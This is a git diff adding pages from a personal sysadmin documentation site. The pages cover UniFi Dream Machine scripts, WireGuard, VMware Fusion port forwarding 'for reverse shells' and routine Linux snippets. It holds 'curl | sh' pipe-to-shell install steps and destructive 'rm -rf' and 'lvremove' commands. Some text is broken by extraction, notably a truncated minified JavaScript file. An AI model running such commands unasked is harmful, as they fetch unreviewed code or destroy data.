index 000000000..599ec128f
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/index.html
@@ -0,0 +1,169 @@
+
Better Fan Speeds - 3os udm ubiquiti unifi Authors: fire1ce | Created: 2022-07-23 | Last update: 2022-08-02 UDM Better Fan Speeds Github Repository: UDM Better Fan Speeds
Repository Deprecation Notice Repository Deprecation Notice: This project is now deprecated and archived due to the release of UniFi's firmware v2.x and v3.x for Dream Machines, which natively fix the fan speed issues.
This repository only works with firmware 1.x. UDM-PRO Please consider upgrading your firmware for improved functionality.
What It Does It stops the built-in service that monitors the thermal values, fan speed and connection of a HDD/SSD. After that it sets the thermal/fan chip (adt7475) to automatic mode. Once that is done it changes the thermal and fan threshold values specified in the script. If you like, you can change the values to your own preferences.
Compatibility WARNING USE THIS AT YOUR OWN RISK. If you apply inappropriate settings with this script, you will possibly (soft- or hard-) brick your equipment.
Requirements Persistence on Reboot is required. This can be accomplished with a boot script. Follow this guide: UDM Boot Script
Installation curl -s https://raw.githubusercontent.com/fire1ce/UDM-Better-Fan-Speeds/main/install.sh | sh
+
Configuration You can edit the fan-speed settings at
/mnt/data/on_boot.d/11-udm-better-fan-speed.sh
+
Credit Based on renedis/ubnt-auto-fan-speed by ReneDIS . Thanks
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/index.html b/infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/index.html
new file mode 100644
index 000000000..c4b81fed7
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/index.html
@@ -0,0 +1,168 @@
+
UDM Cloudflare DDNS - 3os udm ubiquiti unifi cloudflare Authors: fire1ce | Created: 2022-07-23 | Last update: 2022-08-02 UDM Cloudflare DDNS Github Repository: UDM Cloudflare DDNS
Change Log 2022-22-2 - Major Update for UDM v2.x and v3.x What It Does This will allow you to spawn a container with podman
to handle DDNS updates for the main internet IP address. The container will run in the background without any system permissions.
Compatibility Requirements Persistence on Reboot is required. This can be accomplished with a boot script. Follow this guide: UDM Boot Script
Creating a Cloudflare API token To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard. Use the generated token at the API_KEY
variable for the container Installation curl -s https://raw.githubusercontent.com/fire1ce/UDM-Cloudflare-DDNS/main/install.sh | sh
+
Configuration will be updated soon
Back to top
\ No newline at end of file
diff --git a/infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/index.html b/infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/index.html
new file mode 100644
index 000000000..0be675d68
--- /dev/null
+++ b/infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/index.html
@@ -0,0 +1,214 @@
+
Wireguard VPN - 3os udm ubiquiti unifi wireguard Authors: fire1ce | Created: 2022-06-25 | Last update: 2022-08-05 Wireguard VPN WireGuard® is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPsec, while avoiding the massive headache. It intends to be considerably more performant than OpenVPN. WireGuard is designed as a general purpose VPN for running on embedded interfaces and super computers alike, fit for many different circumstances. Initially released for the Linux kernel, it is now cross-platform (Windows, macOS, BSD, iOS, Android) and widely deployable. It is currently under heavy development, but already it might be regarded as the most secure, easiest to use, and simplest VPN solution in the industry.
Github Repository: wireguard-vyatta-ubnt
A guide on installing and using the WireGuard kernel module and tools on Ubiquiti UnifiOS routers (UDM, UDR, and UXG).
Installation Download the latest release for UnifiOS. Use the correct link in the command below
curl -Lfo UnifiOS-wireguard.tar.gz https://github.com/WireGuard/wireguard-vyatta-ubnt/releases/download/${ RELEASE } /UnifiOS-${ RELEASE } .tar.gz
+
Extract the files to your data directory and run the setup script.
For the UDM/P or UXG-Pro, extract the files into /mnt/data/wireguard
tar -C /mnt/data -xvf UnifiOS-wireguard.tar.gz
+/mnt/data/wireguard/setup_wireguard.sh
+
For the UDM-SE or UDR, extract the files into /data/wireguard
tar -C /data -xvf UnifiOS-wireguard.tar.gz
+/data/wireguard/setup_wireguard.sh
+
The setup script will load the wireguard module, and setup the symbolic links for the wireguard tools (wg-quick and wg). You can run dmesg
to verify the kernel module was loaded. You should see something like the following:
[13540.520120] wireguard: WireGuard 1.0.20210219 loaded. See www.wireguard.com for information.
+[13540.520126] wireguard: Copyright (C) 2015-2019 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.
+
Now you should be able to create a wireguard interface. Please see usage below.
Compatibility The wireguard module and tools included in this package have been tested on the following Ubiquiti devices:
Unifi Dream Machine (UDM) and UDM-Pro 0.5.x, 1.9.x, 1.10.x, 1.11.x. UDM-SE and Unifi Dream Router (UDR) 2.2.x UniFi Next-Gen Gateway (UXG-Pro) 1.11.x Note that for the UDM, UDM Pro, and UXG-Pro, Ubiquiti includes the wireguard module in the official kernel since firmware 1.11.0-14, but doesn't include the WireGuard tools. The setup script in this package will try to load the built-in wireguard module if it exists first.
Upgrade Unload the wireguard module.
Re-install wireguard by following the Installation instructions above to get the latest version.
Uninstallation Delete the wireguard files from your data directory.
rm -rf /mnt/data/wireguard
+
Delete the wireguard tools and any boot scripts.
rm /usr/bin/wg /usr/bin/wg-quick
+
Usage Read the documentation on WireGuard.com for general WireGuard concepts. Here is a simple example of a wireguard server configuration for UnifiOS.
Create the server and client public/private key pairs by running the following. This will create the files privatekey_server
, publickey_server
and privatekey_client1
, publickey_client1
. These contain the public and private keys. Store these files somewhere safe.
wg genkey | tee privatekey_server | wg pubkey > publickey_server
+wg genkey | tee privatekey_client1 | wg pubkey > publickey_client1
+
On your UDM/UDR, create a wireguard config under /etc/wireguard
named wg0.conf
. Here is an example server config. Remember to use the correct server private key and the client public key .
[Interface]
+Address = 10.0.2.1/24
+PrivateKey = <server's privatekey>
+ListenPort = 51820
+
+[Peer]
+PublicKey = <client's publickey>
+AllowedIPs = 10.0.2.2/32
+
For your client, you will need a client config like the following example. Remember to use the correct client private key and the server public key .
[Interface]
+Address = 10.0.2.2/32
+PrivateKey = <client's privatekey>
+
+[Peer]
+PublicKey = <server's publickey>
+Endpoint = <server's ip>:51820
+AllowedIPs = 10.0.2.0/24
+
Adjust Address to change the IP of the client. Adjust AllowedIPs to set what your client should route through the tunnel. Set to 0.0.0.0/0,::/0
to route all the client's Internet through the tunnel. See the WireGuard documentation for more information. Note each different client requires their own private/public key pair, and the public key must be added to the server's WireGuard config as a separate Peer. To bring the tunnel up, run wg-quick up <config>
. Verify the tunnel received a handshake by running wg
. wg-quick up /etc/wireguard/wg0.conf
+
To bring down the tunnel, run wg-quick down <config>
. wg-quick down /etc/wireguard/wg0.conf
+
In your UniFi Network settings, add a WAN_LOCAL (or Internet Local) firewall rule to ACCEPT traffic destined to UDP port 51820 (or your ListenPort if different). Opening this port in the firewall is needed so remote clients can access the WireGuard server. Routing The AllowedIPs parameter in the wireguard config allows you to specify which destination subnets to route through the tunnel.
If you want to route router-connected clients through the wireguard tunnel based on source subnet or source VLAN, you need to set up policy-based routing. Currently, there is no GUI support for policy-based routing in UnifiOS, but it can be set up in SSH by using ip route
to create a custom routing table, and ip rule
to select which clients to route through the custom table.
For a script that makes it easy to set-up policy-based routing rules on UnifiOS, see the split-vpn project.
Binaries Prebuilt binaries are available under releases .
The binaries are statically linked against musl libc to mitigate potential issues with UnifiOS' glibc.
Persistence on Reboot The setup script must be run every time the system is rebooted to link the wireguard tools and load the module. This can be accomplished with a boot script.
For the UDM or UDM Pro, install UDM Utilities on-boot-script by following the instructions here , then create a boot script under /mnt/data/on_boot.d/99-setup-wireguard.sh
and fill it with the following contents. Remember to run chmod +x /mnt/data/on_boot.d/99-setup-wireguard.sh
afterwards.
Click here to see the boot script.
#!/bin/sh
+/mnt/data/wireguard/setup_wireguard.sh
+
For the UDM-SE or UDR, create a systemd boot service to run the setup script at boot. Create a service file under /etc/systemd/system/setup-wireguard.service
and fill it with the following contents. After creating the service, run systemctl daemon-reload && systemctl enable setup-wireguard
to enable the service on boot. Click here to see the boot service.
[Unit]
+Description = Run wireguard setup script
+Wants = network.target
+After = network.target
+
+[Service]
+Type = oneshot
+ExecStart = sh -c 'WGDIR="$(find /mnt/data/wireguard /data/wireguard -maxdepth 1 -type d -name "wireguard" 2>/dev/null | head -n1)" ; "$WGDIR/setup_wireguard.sh"'
+
+[Install]
+WantedBy = multi-user.target
+
Note this only adds the setup script to start at boot. If you also want to bring your wireguard interface up at boot, you will need to add another boot script with your wg-quick up
command.
Troubleshooting Setup script returns error "Unsupported Kernel version XXX" * The wireguard package does not contain a wireguard module built for your firmware or kernel version, nor is there a built-in module in your kernel. Please open an issue and report your version so we can try to update the module. wg-quick up returns error "unable to initialize table 'raw'" * Your kernel does not have the iptables raw module. The raw module is only required if you use `0.0.0.0/0` or `::/0` in your wireguard config's AllowedIPs. A workaround is to instead set AllowedIPs to `0.0.0.0/1,128.0.0.0/1` for IPv4 or `::/1,8000::/1` for IPv6. These subnets cover the same range but do not invoke wg-quick's use of the iptables raw module. Credits Original work to compile WireGuard on UnifiOS by @tusc (wireguard-kmod ).
"WireGuard" and the "WireGuard" logo are registered trademarks of Jason A. Donenfeld.
The built-in gateway DNS does not reply to requests from the WireGuard tunnel The built-in dnsmasq on UnifiOS is configured to only listen for requests from specific interfaces. The wireguard interface name (e.g.: wg0) needs to be added to the dnsmasq config so it can respond to requests from the tunnel. You can run the following to add wg0 to the dnsmasq interface list: echo "interface=wg0" > /run/dnsmasq.conf.d/custom_listen.conf
+killall -9 dnsmasq
+
You can also add those commands to PostUp in your wireguard config's Interface section to automatically run them when the tunnel comes up, e.g.: PostUp = echo "interface=%i" > /run/dnsmasq.conf.d/custom_listen.conf; killall -9 dnsmasq
+ PreDown = rm -f /run/dnsmasq.conf.d/custom_listen.conf; killall -9 dnsmasq
+
Back to top
\ No newline at end of file
diff --git a/infrastructure/vmware/vmware-fusion/index.html b/infrastructure/vmware/vmware-fusion/index.html
new file mode 100644
index 000000000..24e880bdc
--- /dev/null
+++ b/infrastructure/vmware/vmware-fusion/index.html
@@ -0,0 +1,172 @@
+
VMware Fusion - 3os vmware vmware-fusion Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-05 VMware Fusion Port Forwarding for Reverse Shells If you use your vm as NAT network "Shared with My Mac" You can forward a port to your host macOS machine.
The network configuration files are stored their respective folders within the VMware Fusion preferences folder.
/Library/Preferences/VMware\ Fusion/
+
In order to find the right network config you can inspect the dhcpd.conf inside of vmnet* folders.
After you found the correct network it should contain a nat.conf file Edit the (with sudo privileges) nat.conf , For UDP protocol edit the section [incomingudp] for TCP protocol edit the [incomingtcp]
In the next example we will forward port 4444 from the VM to the 4444 port on the host. You can forward any port to any port as you like.
After you saved the configuration nat.conf file you must restart VMware's network services
You do NOT need to restart the Virtual Machine
sudo /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --stop
+sudo /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli --start
+
If you want to test the port forwarding is working as it should here's an example of running simple python webserver on the vm on port 4444 we configured before:
python -m SimpleHTTPServer 4444
+
Now you can test it on the Host machine by browsing to http://localhost:4444
or http://127.0.0.1:4444
Back to top
\ No newline at end of file
diff --git a/js/timeago.min.js b/js/timeago.min.js
new file mode 100644
index 000000000..a8530a5f7
--- /dev/null
+++ b/js/timeago.min.js
@@ -0,0 +1,2 @@
+/* Taken from https://cdnjs.cloudflare.com/ajax/libs/timeago.js/4.0.2/timeago.min.js */
+!function(s,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n((s=s||self).timeago={})}(this,function(s){"use strict";var a=["second","minute","hour","day","week","month","year"];function n(s,n){if(0===n)return["just now","right now"];var e=a[Math.floor(n/2)];return 1
=m[t]&&t=m[e]&&e 0) {
+ var locale = nodes[0].getAttribute('locale');
+ timeago.render(nodes, locale);
+ }
+ })
+} else {
+ var nodes = document.querySelectorAll('.timeago');
+ if (nodes.length > 0) {
+ var locale = nodes[0].getAttribute('locale');
+ timeago.render(nodes, locale);
+ }
+}
diff --git a/linux/Network/identify-nics/index.html b/linux/Network/identify-nics/index.html
new file mode 100644
index 000000000..4322bd13a
--- /dev/null
+++ b/linux/Network/identify-nics/index.html
@@ -0,0 +1,198 @@
+ Identify Network Interfaces - 3os linux network Authors: fire1ce | Created: 2022-04-22 | Last update: 2022-04-22 Identify Physical Network Interfaces The Problem Servers usually have a number of physical network interfaces. The network interface names on a linux host usually won't tell you much about which physical network interface corresponds to the interface name. Therefore, it creates a problem when you want to use a specific network interface for a specific purpose but you don't know which physical network interface corresponds to the interface name.
The Solution ethtool
tool can be used to identify the physical network interface corresponding to a network interface name.
For this method to work, you need a physical access
to host's network cards and the physical network interfaces should have Led indicator
lights.
Note
This functionality of ethtool may not be supported by all server or network card hardware.
ethtool
usually isn't installed by default on a linux host. You can install it by running the following command (debian example):
Find the network interfaces present on the host and run the following command for each network interface:
or
Now you can use the ethtool
command to identify the physical network interface corresponding to the network interface name.
Example for eth0
network interface name:
ethtool --identify eth0
+
This command will run until you stop it. When it's running, you should see the LED indicator light blinking
(usually orange) on the physical network interface corresponding to the network interface name.
To get information about the hardware capabilities of the network interface:
output example:
ethtool enp12s0f4
+
+Settings for enp12s0f4:
+ Supported ports: [ FIBRE ]
+ Supported link modes: 1000baseT/Full
+ 10000baseT/Full
+ Supported pause frame use: Symmetric Receive-only
+ Supports auto-negotiation: No
+ Supported FEC modes: None
+ Advertised link modes: 10000baseT/Full
+ Advertised pause frame use: Symmetric
+ Advertised auto-negotiation: No
+ Advertised FEC modes: None
+ Link partner advertised link modes: Not reported
+ Link partner advertised pause frame use: Symmetric
+ Link partner advertised auto-negotiation: No
+ Link partner advertised FEC modes: None
+ Speed: 10000Mb/s
+ Duplex: Full
+ Auto-negotiation: off
+ Port: Direct Attach Copper
+ PHYAD: 255
+ Transceiver: internal
+ Current message level: 0x000000ff ( 255 )
+ drv probe link timer ifdown ifup rx_err tx_err
+ Link detected: yes
+
Back to top
\ No newline at end of file
diff --git a/linux/files-handling/index.html b/linux/files-handling/index.html
new file mode 100644
index 000000000..97425cf49
--- /dev/null
+++ b/linux/files-handling/index.html
@@ -0,0 +1,178 @@
+ Files Handling - 3os linux files-handling Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-07-09 Files Handling NCurses Disk Usage Ncdu is a disk usage analyzer with an ncurses interface.
Delete Large File List - Argument list too long find . -name '*' | xargs rm
+
Change permissions (chmod) to folders and files find . -type d -exec chmod 755 {} +
+find . -type f -exec chmod 644 {} +
+
Recursively chown user and group chown -R user:group /some/path/here
+
Recursively chmod to 775/664 chmod -R a = ,a+rX,u+w,g+w /some/path/here
+
^ ^ ^ ^ adds write to group
+ | | | adds write to user
+ | | adds read to all and execute to all folders ( which controls access)
+ | sets all to ` 000 `
+
Find UID/GID for user
Back to top
\ No newline at end of file
diff --git a/linux/general-snippets/index.html b/linux/general-snippets/index.html
new file mode 100644
index 000000000..86366cf95
--- /dev/null
+++ b/linux/general-snippets/index.html
@@ -0,0 +1,184 @@
+ General Snippets - 3os linux snippets Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-09-22 General Snippets Disable SSH Login Welcome Message To disable
To re-enable
Change Sudo Password Requirement Timeout In Linux To change sudo password timeout limit in Linux, run:
This command will open the /etc/sudoers  file in nano  editor.
Find the following line:
Change it like below the 30 is the number of minutes you want to set the timeout to.
Defaults env_reset, timestamp_timeout = 30
+
Redirect Output to a File and Stdout With tee The command you want is named tee
:
For example, if you only care about stdout:
ls -a | tee output.file
+
If you want to include stderr, do:
program [ arguments...] 2 >& 1 | tee outfile
+
2>&1 redirects channel 2 (stderr/standard error) into channel 1 (stdout/standard output), such that both is written as stdout. It is also directed to the given output file as of the tee command.
Furthermore, if you want to append to the log file, use tee -a as:
program [ arguments...] 2 >& 1 | tee -a outfile
+
Add Permanent Path to Application First find the location of the Application/Service:
find / -name ApplicationName
+
Go to the path where the application is located
cd "../../../ApplicationName"
+
Run this command for ZSH:
echo 'export PATH="' $( pwd ) ':$PATH"' >> ~/.zshrc && source ~/.zshrc
+
Run this command for "shell Profile":
echo 'export PATH="' $( pwd ) ':$PATH"' >> ~/.profile && source ~/.profile
+
Run this command for "shell":
echo 'export PATH="' $( pwd ) ':$PATH"' >> ~/.shellrc && source ~/.shellrc
+
Create Symbolic Links To create a symbolic link in Unix/Linux, at the terminal prompt, enter:
ln -s source_file target_file
+
to remove symbolic link use the rm
command on the link
Open Last Edited File less ` ls -dx1tr /usr/local/cpanel/logs/cpbackup/*| tail -1`
+
Kill Process That Runs More Than X Time Kill cgi after 30 secs:
for i in ` ps -eo pid,etime,cmd| grep cgi| awk '$2 > "00:30" {print $1}' ` ; do kill $i ; done
+
Back to top
\ No newline at end of file
diff --git a/linux/locales-time-zone/index.html b/linux/locales-time-zone/index.html
new file mode 100644
index 000000000..7a2f3c84e
--- /dev/null
+++ b/linux/locales-time-zone/index.html
@@ -0,0 +1,174 @@
+ Locales & Timezone - 3os linux locales timezone Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-08-02 Locales & Timezone Fix Locales (Fix Bash Local Error) Set the Locale, Find the en_US.UTF-8 in the list and select it, at the following screen select it.
dpkg-reconfigure locales
+
Set System Time With Time Zone (timedatectl ntp) Find your time zone with timedatectl list-timezones use grep for easier results:
timedatectl list-timezones | grep "Toronto"
+
The output should look like this:
Now set the Time Zone and active it.
timedatectl set-timezone Asia/Jerusalem
+timedatectl set-ntp true
+
Now test timedatectl status
Check your system time
Back to top
\ No newline at end of file
diff --git a/linux/lvm-partitions/index.html b/linux/lvm-partitions/index.html
new file mode 100644
index 000000000..8827f6df0
--- /dev/null
+++ b/linux/lvm-partitions/index.html
@@ -0,0 +1,173 @@
+ LVM Partitions - 3os linux lvm Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 LVM Partitions Removing LVM Partition and Merging In To / (root partition) Find out the names of the partition with df
You need to unmount the partitions before you can delete and merge them. Back up the data of the partition you would like to delete; this example will use "centos-home" as the partition that will be merged into the root partition.
umount -a
+lvremove /dev/mapper/centos-home
+lvextend -l +100%FREE -r /dev/mapper/centos-root
+
After the merging and before mounting you should remove the partition from fstab
nano /etc/fstab
+mount -a
+
Back to top
\ No newline at end of file
diff --git a/linux/memory-swap/index.html b/linux/memory-swap/index.html
new file mode 100644
index 000000000..bf9fc3967
--- /dev/null
+++ b/linux/memory-swap/index.html
@@ -0,0 +1,170 @@
+ Memory & Swap - 3os linux Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Memory & Swap Who Uses RAM ps aux | awk '{print $6/1024 " MB\t\t" $11}' | sort -n
+
Who Is Using Swap Memory grep VmSwap /proc/*/status 2 >/dev/null | sort -nk2 | tail -n5
+
Clear Cache and Swap echo 3 > /proc/sys/vm/drop_caches && swapoff -a && swapon -a
+
Back to top
\ No newline at end of file
diff --git a/linux/services-and-daemons/index.html b/linux/services-and-daemons/index.html
new file mode 100644
index 000000000..bb3942d53
--- /dev/null
+++ b/linux/services-and-daemons/index.html
@@ -0,0 +1,154 @@
+ Services and daemons - 3os Authors: fire1ce | Created: 2023-01-05 | Last update: 2023-01-05 Services & Daemons In Linux, a service is a program that runs in the background and performs a specific function. A daemon is a type of service that also runs in the background and often starts at boot time. These processes can be controlled using the systemctl or service command. Services and daemons are an important part of the Linux operating system, as they provide various functions and services that allow the system to run smoothly. There are many different types of services and daemons that can be found on a typical Linux system, and you can find more information about them in the documentation for your specific distribution.
Useful systemctl
commands Start the specified service.
systemctl start <service>
+
Stop the specified service.
systemctl stop <service>
+
Restart the specified service.
systemctl restart <service>
+
Enable the specified service to start automatically at boot time.
systemctl enable <service>
+
Disable the specified service from starting automatically at boot time.
systemctl disable <service>
+
Show the current status and runtime information for the specified service.
systemctl status <service>
+
Show the dependencies for the specified service.
systemctl list-dependencies <service>
+
List all installed unit files on the system.
systemctl list-units --all
+
Display Running Services The systemctl command with the grep command will display a list of all running services and daemons on your Linux system. The grep command will search the output of systemctl for the string "running" and only display the lines that contain that string.
systemctl | grep running
+
For more readable output:
systemctl --no-pager | grep running | column -t
+
Display Enabled Services systemctl list-unit-files --state=enabled
is a command that shows a list of unit files that are currently enabled on the system. The --state option specifies the state of the unit files that you want to see. By using --state=enabled, you will see only unit files that are enabled and will be started automatically when the system boots.
systemctl list-unit-files --state=enabled
+
Back to top
\ No newline at end of file
diff --git a/linux/smb-mount-autofs/index.html b/linux/smb-mount-autofs/index.html
new file mode 100644
index 000000000..bf97c2a04
--- /dev/null
+++ b/linux/smb-mount-autofs/index.html
@@ -0,0 +1,186 @@
+ SMB Mount With autofs - 3os smb share autofs mount Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-07-09 SMB Mount With autofs Install autofs cifs-utils
apt install -y autofs cifs-utils
+
Edit the auto.cifs file
Add this to the file: ("media" - is any name for your mount)
media -fstype= cifs,rw,noperm,vers= 3 .0,credentials= /etc/.credentials.txt ://oscar.3os.re/active-share/media
+
Create credentials file
nano /etc/.credentials.txt
+
Add your credentials for the smb mount:
username = YourUser
+password = YourPassword
+
Exit and save:
At the end of the file add: ("/mnt" - mount location, /etc/auto.cifs your config for mounting the SMB Share)
/mnt /etc/auto.cifs --timeout= 600 --ghost
+
Save and exit. Test the mounting.
systemctl start autofs
+cd /mnt/media/
+ls
+
You should see the mount over there. Enable autofs on boot:
systemctl enable autofs
+
SMB Mount on Linux With Credentials sudo apt-get install cifs-utils
+nano ~/.smbcredentials
+
add this to the config.
username = msusername
+password = mspassword
+
Save the file, exit the editor. Change the permissions of the file to prevent unwanted access to your credentials:
chmod 600 ~/.smbcredentials
+
Then edit your /etc/fstab file (with root privileges) to add this line (replacing the insecure line in the example above, if you added it):
//servername/sharename /media/windowsshare cifs vers = 1 .0,credentials= /home/ubuntuusername/.smbcredentials,iocharset= utf8,sec= ntlm 0 0
+
Save the file, exit the editor.
Finally, test the fstab entry by issuing:
If there are no errors, you should test how it works after a reboot. Your remote share should mount automatically.
Back to top
\ No newline at end of file
diff --git a/linux/ssh-hardening-with-rsa-keys/index.html b/linux/ssh-hardening-with-rsa-keys/index.html
new file mode 100644
index 000000000..8da68234f
--- /dev/null
+++ b/linux/ssh-hardening-with-rsa-keys/index.html
@@ -0,0 +1,180 @@
+ SSH Hardening with SSH Keys - 3os linux ssh rsa Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 SSH Hardening with SSH Keys Generating a new SSH key RSA 4096
ssh-keygen -t rsa -b 4096 -C "your_email@example.com"
+
Ed25519 Algorithm
ssh-keygen -t ed25519 -C "your_email@example.com"
+
Automatic Copy RSA Key to The Server ssh-copy-id -i ~/.ssh/id_rsa.pub user@host
+
Manually Copy RSA Key to The Server ssh to the host (do not close this connection
)
mkdir -p ~/.ssh && touch .ssh/authorized_keys
+
copy your public key usually located at ~/.ssh/id_rsa.pub
echo PUBLIC_KEY_STRING >> ~/.ssh/authorized_keys
+
SSH Hardening - Disable Password Login edit /etc/ssh/sshd_config
change:
#PasswordAuthentication yes
+
to
PasswordAuthentication no
+
save&exit
restart ssh service:
sudo systemctl restart ssh
+
Danger
Open a new SSH session and test login with the SSH keys before closing the existing connection
Optional: change ssh port edit /etc/ssh/sshd_config
change the port to a desired one
save&exit
restart ssh service:
sudo systemctl restart ssh
+
Add Private id_rsa Key to Server Copy the id_rsa key to the ~/.ssh folder
cd ~/.ssh
+sudo ssh-agent bash
+ssh-add id_rsa
+
Back to top
\ No newline at end of file
diff --git a/linux/ubuntu-debian/disable-ipv6/index.html b/linux/ubuntu-debian/disable-ipv6/index.html
new file mode 100644
index 000000000..ddd127b0e
--- /dev/null
+++ b/linux/ubuntu-debian/disable-ipv6/index.html
@@ -0,0 +1,171 @@
+ Disable IPv6 via Grub - 3os ubuntu debian ipv6 Authors: fire1ce | Created: 2022-06-28 | Last update: 2022-07-17 Disable IPv6 on Ubuntu and Debian Linux Permanently By default, Ubuntu/Debian IPv6 is enabled after installation. This means that the IPv6 stack is active and the host can communicate with other hosts on the same network via IPv6 protocol.
You can disable IPv6 on Ubuntu/Debian by editing the /etc/default/grub
file.
add ipv6.disable=1
to the end of GRUB_CMDLINE_LINUX_DEFAULT
and GRUB_CMDLINE_LINUX
line. Don't change the other values at those lines.
GRUB_CMDLINE_LINUX_DEFAULT = "ipv6.disable=1"
+GRUB_CMDLINE_LINUX = "ipv6.disable=1"
+
The config should look like this:
Update the grub configuration.
Save and exit. Reboot
to apply the changes.
Back to top
\ No newline at end of file
diff --git a/linux/ubuntu-debian/free-port-53/index.html b/linux/ubuntu-debian/free-port-53/index.html
new file mode 100644
index 000000000..2afcbabaa
--- /dev/null
+++ b/linux/ubuntu-debian/free-port-53/index.html
@@ -0,0 +1,170 @@
+ Free Port 53 on Ubuntu - 3os Ubuntu dns Authors: fire1ce | Created: 2022-06-28 | Last update: 2022-06-28 Free Port 53 on Ubuntu What's Using Port 53? When you install Ubuntu (in my case its Server version). It uses systemd-resolved as internal DNS Forwarder.
systemd-resolved is a system service that provides network name resolution to local applications. It implements a caching and validating DNS/DNSSEC stub resolver, as well as an LLMNR resolver and responder.
How to Free Port 53 on Ubuntu If we want to use port 53 for other purposes, we need to free it for example a Pihole DNS
server.
We can do it with the following commands:
sudo sed -r -i.orig 's/#?DNSStubListener=yes/DNSStubListener=no/g' /etc/systemd/resolved.conf
+sudo sh -c 'rm /etc/resolv.conf && ln -s /run/systemd/resolve/resolv.conf /etc/resolv.conf'
+sudo systemctl restart systemd-resolved
+
Back to top
\ No newline at end of file
diff --git a/linux/ubuntu-debian/remove-snap-store/index.html b/linux/ubuntu-debian/remove-snap-store/index.html
new file mode 100644
index 000000000..b8b960b9d
--- /dev/null
+++ b/linux/ubuntu-debian/remove-snap-store/index.html
@@ -0,0 +1,170 @@
+ Remove Snap Store - 3os ubuntu Authors: fire1ce | Created: 2022-06-28 | Last update: 2022-06-28 Remove Snap Store from Ubuntu What Is Snap? Snap is a cross-platform packaging and deployment system developed by Canonical, the makers of Ubuntu, for the Linux platform. It's compatible with most major Linux distros, including Ubuntu, Debian, Arch Linux, Fedora, CentOS, and Manjaro.
How To Remove Snap Store sudo rm -rf /var/cache/snapd/
+sudo apt autoremove --purge snapd gnome-software-plugin-snap
+sudo rm -rf ~/snap
+
Back to top
\ No newline at end of file
diff --git a/linux/ubuntu-debian/unattended-upgrades/index.html b/linux/ubuntu-debian/unattended-upgrades/index.html
new file mode 100644
index 000000000..ba4522463
--- /dev/null
+++ b/linux/ubuntu-debian/unattended-upgrades/index.html
@@ -0,0 +1,250 @@
+ Unattended Upgrades - 3os ubuntu Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Unattended Upgrades sudo apt install -y unattended-upgrades apt-listchanges
+
Edit the config to your preference
sudo nano /etc/apt/apt.conf.d/50unattended-upgrades
+
Example
Ubuntu Debian/RaspberyOS
Unattended-Upgrade::Allowed-Origins {
+"${distro_id}:${distro_codename}";
+"${distro_id}:${distro_codename}-security";
+// Extended Security Maintenance; doesn't necessarily exist for
+// every release and this system may not have it installed, but if
+// available, the policy for updates is such that unattended-upgrades
+// should also install from here by default.
+"${distro_id}ESMApps:${distro_codename}-apps-security";
+"${distro_id}ESM:${distro_codename}-infra-security";
+"${distro_id}:${distro_codename}-updates";
+"${distro_id}:${distro_codename}-proposed";
+// "${distro_id}:${distro_codename}-backports";
+};
+
+Unattended-Upgrade::DevRelease "auto";
+Unattended-Upgrade::AutoFixInterruptedDpkg "true";
+Unattended-Upgrade::MinimalSteps "true";
+Unattended-Upgrade::InstallOnShutdown "false";
+//Unattended-Upgrade::Mail "";
+//Unattended-Upgrade::MailReport "on-change";
+Unattended-Upgrade::Remove-Unused-Kernel-Packages "true";
+Unattended-Upgrade::Remove-New-Unused-Dependencies "true";
+Unattended-Upgrade::Remove-Unused-Dependencies "true";
+Unattended-Upgrade::Automatic-Reboot "true";
+Unattended-Upgrade::Automatic-Reboot-WithUsers "true";
+Unattended-Upgrade::Automatic-Reboot-Time "06:00";
+//Acquire::http::Dl-Limit "70";
+// Unattended-Upgrade::SyslogEnable "false";
+// Unattended-Upgrade::SyslogFacility "daemon";
+// Unattended-Upgrade::OnlyOnACPower "true";
+// Unattended-Upgrade::Skip-Updates-On-Metered-Connections "true";
+// Unattended-Upgrade::Verbose "false";
+// Unattended-Upgrade::Debug "false";
+// Unattended-Upgrade::Allow-downgrade "false";
+
Unattended-Upgrade::Origins-Pattern {
+// Codename based matching:
+// This will follow the migration of a release through different
+// archives (e.g. from testing to stable and later oldstable).
+// Software will be the latest available for the named release,
+// but the Debian release itself will not be automatically upgraded.
+"origin=Debian,codename=${distro_codename}-updates";
+// "origin=Debian,codename=${distro_codename}-proposed-updates";
+"origin=Debian,codename=${distro_codename},label=Debian";
+"origin=Debian,codename=${distro_codename},label=Debian-Security";
+
+// Archive or Suite based matching:
+// Note that this will silently match a different release after
+// migration to the specified archive (e.g. testing becomes the
+// new stable).
+// "o=Debian,a=stable";
+// "o=Debian,a=stable-updates";
+// "o=Debian,a=proposed-updates";
+// "o=Debian Backports,a=${distro_codename}-backports,l=Debian Backports";
+};
+
+Unattended-Upgrade::DevRelease "auto";
+Unattended-Upgrade::AutoFixInterruptedDpkg "true";
+Unattended-Upgrade::MinimalSteps "true";
+Unattended-Upgrade::InstallOnShutdown "false";
+//Unattended-Upgrade::Mail "";
+//Unattended-Upgrade::MailReport "on-change";
+Unattended-Upgrade::Remove-Unused-Kernel-Packages "true";
